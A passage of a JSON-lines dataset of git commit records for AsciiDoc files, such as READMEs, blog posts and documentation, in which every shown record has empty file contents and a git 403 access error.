'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87258c7e2c90924adeab6e536432445ed2136953","subject":"Initial readme commit","message":"Initial readme commit\n","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5e632abbe85ed02f706537fdd754b480541d715b","subject":"Add README.","message":"Add README.\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/sshfp-tool","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/sshfp-tool.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f003594e12724b5cb6e421e3a6375155c870399","subject":"Add Travis CI build status badge","message":"Add Travis CI build status badge\n","repos":"spodin\/algorithms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fc7aba99bbf5865da581f68c518eccfc5066df3","subject":"Update 2015-10-10-Space-Quest.adoc","message":"Update 2015-10-10-Space-Quest.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-10-Space-Quest.adoc","new_file":"_posts\/2015-10-10-Space-Quest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39466ea71ec018cf2f7c9771845f5845441c901","subject":"Update documentation version.","message":"Update documentation version.\n","repos":"zl352773277\/django-redis,yanheng\/django-redis,GetAmbassador\/django-redis,smahs\/django-redis,lucius-feng\/django-redis","old_file":"doc\/django-redis.asciidoc","new_file":"doc\/django-redis.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yanheng\/django-redis.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4a6e9329e1b9a1298d4c7c9895c667a54d1354ba","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/207","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/207\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4aa665bab8ef538dc547eaa59fe107733ca58c4","subject":"updated readme and contributing information","message":"updated readme and contributing information\n","repos":"spring-projects\/toolsuite-distribution,spring-projects\/toolsuite-distribution,spring-projects\/toolsuite-distribution","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/toolsuite-distribution.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ccc0311ebf253820954923cb40bbe05f92bebaab","subject":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","message":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea2bac6c5f13c92e9300b2c84c01113f2c7795da","subject":"Exposing port 8080 in the README example.","message":"Exposing port 8080 in the README example.\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c822299f7c0ad7dd66e836e9d56a691fb45e2a2d","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"atfd\/hubpress.io,atfd\/hubpress.io,atfd\/hubpress.io,atfd\/hubpress.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atfd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89ceca2b87ab5c1d6d8985936add88931072d671","subject":"Add Angular 2 documentation section","message":"Add Angular 2 documentation section\n","repos":"vaadin\/vaadin-combo-box,vaadin\/vaadin-combo-box","old_file":"docs\/vaadin-combo-box-angular2.adoc","new_file":"docs\/vaadin-combo-box-angular2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/vaadin-combo-box.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd028d208b453b5df92d15f86c330a6eebfdceba","subject":"Create WindowsMsys2.adoc","message":"Create WindowsMsys2.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/WindowsMsys2.adoc","new_file":"wiki\/installation\/WindowsMsys2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8243fd797ef5471c0d72efbeac04a061887e34f4","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0611a9790cf3ce921c31508c62e276bf3f4b4599","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ecabc1f03ee0536df6eb32212298b45382137e2","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cfc895d8e450568d5cc1da4b53b29724f092eab","subject":"Blog post: How lucky are your random seeds? (correction)","message":"Blog post: How lucky are your random seeds? (correction)\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49d5496de6a1e79aaa76e5f26f910d21fd6b554b","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e00cdaa51ab8a0a90c2fa62c335383d2ec94744","subject":"Update 2015-10-05-Deceived-by-Charms.adoc","message":"Update 2015-10-05-Deceived-by-Charms.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Deceived-by-Charms.adoc","new_file":"_posts\/2015-10-05-Deceived-by-Charms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9854e2443dbdd3d2d39e159623d642c44985e427","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73f4f26fadc5f5558a9b104c8b0822f6fd32b3c9","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acc5043899fa08931b211a8ea9edbc882a1ccf3","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"718d4ed23787e3e29fd9187af986df5693091cd3","subject":"Update 2017-08-26-Kotlin.adoc","message":"Update 2017-08-26-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-26-Kotlin.adoc","new_file":"_posts\/2017-08-26-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55d918f4ab3811318e5372311fd8e46131f25780","subject":"Create 2015-04-15-forge-2.16.0.final.asciidoc","message":"Create 2015-04-15-forge-2.16.0.final.asciidoc","repos":"forge\/docs,luiz158\/docs,addonis1990\/docs,forge\/docs,agoncal\/docs,agoncal\/docs,luiz158\/docs,addonis1990\/docs","old_file":"news\/2015-04-15-forge-2.16.0.final.asciidoc","new_file":"news\/2015-04-15-forge-2.16.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"65268dcbbd0b2098be6f1737cd6ff89997e4f151","subject":"Update 2017-06-03-Debugging-Epoch-Programs.adoc","message":"Update 2017-06-03-Debugging-Epoch-Programs.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-06-03-Debugging-Epoch-Programs.adoc","new_file":"_posts\/2017-06-03-Debugging-Epoch-Programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fb7cef3940ac2c652169590c15963126d65269c","subject":"Update 2019-02-01-vueelement-uislack.adoc","message":"Update 2019-02-01-vueelement-uislack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-vueelement-uislack.adoc","new_file":"_posts\/2019-02-01-vueelement-uislack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e794122af20cb9cc36399543bc5a9b22e3aa8cfd","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e039bbf2d5f0bf39aaa055c4f3a4997e7a06c5","subject":"Update 2016-02-04-O-Hubpress-e-o-meu-blog.adoc","message":"Update 2016-02-04-O-Hubpress-e-o-meu-blog.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-O-Hubpress-e-o-meu-blog.adoc","new_file":"_posts\/2016-02-04-O-Hubpress-e-o-meu-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f87b1da6c3b06a4b609764661394301be5cc945","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/17\/deref.adoc","new_file":"content\/news\/2021\/09\/17\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5d8f4797786c8afbdc6e93dd71eb8d73657e7591","subject":"[docs] Fix placement of decommission docs in rebalancing section","message":"[docs] Fix placement of decommission docs in rebalancing section\n\nChange-Id: I8f4f4fa755a34e21ef26884e998d0e17ba512824\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11627\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d6285aafbcb3cc938d4cafe17bbbad3493da190","subject":"Draft of configuring the local provisioner","message":"Draft of configuring the local provisioner","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/configuring-local-provisioner.adoc","new_file":"modules\/configuring-local-provisioner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af8774471d7e23dc4ce65050dc973a0402a2b288","subject":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af52533f82a3aaa8a5ae41cb5b0fa2bdb71ae88d","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72d21184f34a311fb40166ed490948d431f461f2","subject":"Provide basic GraphQL query examples","message":"Provide basic GraphQL query examples\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06bd0cc81bf95d985e6ecb0276dd669f1ae80f3c","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faae6594c426273fbcaf640ed15311f053d75981","subject":"Create fr\/SUMMARY.adoc","message":"Create fr\/SUMMARY.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/SUMMARY.adoc","new_file":"fr\/SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d2f624435fefc5b188e65d77bb43407320c0ec72","subject":"y2b create post You've Never Seen Shoes Do This...","message":"y2b create post You've Never Seen Shoes Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-18-Youve-Never-Seen-Shoes-Do-This.adoc","new_file":"_posts\/2017-10-18-Youve-Never-Seen-Shoes-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"636c63de22183980f893e2a53b0faa1ad5181213","subject":"App Pic Scanner","message":"App Pic Scanner\n","repos":"visionui\/visionui.github.io,visionui\/visionui.github.io,visionui\/visionui.github.io","old_file":"_posts\/2015-07-08-Pic Scanner.adoc","new_file":"_posts\/2015-07-08-Pic Scanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/visionui\/visionui.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc943f70dd0e21785bbb065e2cdb4441f48ce03e","subject":"Delete 2016-02-26-Gantt-Chart.adoc","message":"Delete 2016-02-26-Gantt-Chart.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt-Chart.adoc","new_file":"_posts\/2016-02-26-Gantt-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932d1aa215e0c0eea7a9ad2563ce9d54305e88ca","subject":"Update 2016-07-21-Hello-World.adoc","message":"Update 2016-07-21-Hello-World.adoc","repos":"jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io","old_file":"_posts\/2016-07-21-Hello-World.adoc","new_file":"_posts\/2016-07-21-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jborichevskiy\/jborichevskiy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcad43b927e9ee0b964e0d7b696d1f9cf6d19040","subject":"Update 2017-03-06-Progress-Update.adoc","message":"Update 2017-03-06-Progress-Update.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-03-06-Progress-Update.adoc","new_file":"_posts\/2017-03-06-Progress-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04c2c6bec169d3eb5b9d8dc2ae551a0c84a2e0ee","subject":"Delete 2017-08-23-Your-Blog-title.adoc","message":"Delete 2017-08-23-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f7c39f9ee049e53d4f7f7eb3fe158212712993f","subject":"Update 2018-05-24-Design-Thinking.adoc","message":"Update 2018-05-24-Design-Thinking.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-05-24-Design-Thinking.adoc","new_file":"_posts\/2018-05-24-Design-Thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9af190644e0896cf9526aa4a937f1247970964","subject":"add german README","message":"add german README\n","repos":"lausser\/coshsh,lausser\/coshsh","old_file":"README.de.asciidoc","new_file":"README.de.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lausser\/coshsh.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"f24f7c8dd6ba95b1e4756711cb78e0d5510c2b6a","subject":"Update 2018-03-09-P-H-Per-Golang.adoc","message":"Update 2018-03-09-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-09-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-09-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d098e0cbbe8c9f3e78b8ba8195bc76ab000e47eb","subject":"Add a higl-level description of the code organization","message":"Add a higl-level description of the code organization","repos":"Enterprise-Content-Management\/infoarchive-sip-sdk,kovaloid\/infoarchive-sip-sdk","old_file":"core\/README.adoc","new_file":"core\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Enterprise-Content-Management\/infoarchive-sip-sdk.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"8eb05307559789c7bd25427d8c30ed276e67a542","subject":"add user guide","message":"add user guide\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"docs\/user_guide.adoc","new_file":"docs\/user_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77176fdab0ac4ea40bd9c42ea9a2db1e57eed49c","subject":"y2b create post Top 5 WTF items on Amazon!","message":"y2b create post Top 5 WTF items on Amazon!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-24-Top-5-WTF-items-on-Amazon.adoc","new_file":"_posts\/2013-07-24-Top-5-WTF-items-on-Amazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fb3c2f94d578c7e4dfc50d83bee4c98dc016c19","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba1fec965b99afbce9d8fd9595987b7406106b82","subject":"Update 2017-07-15-why-we-must-organize.adoc","message":"Update 2017-07-15-why-we-must-organize.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 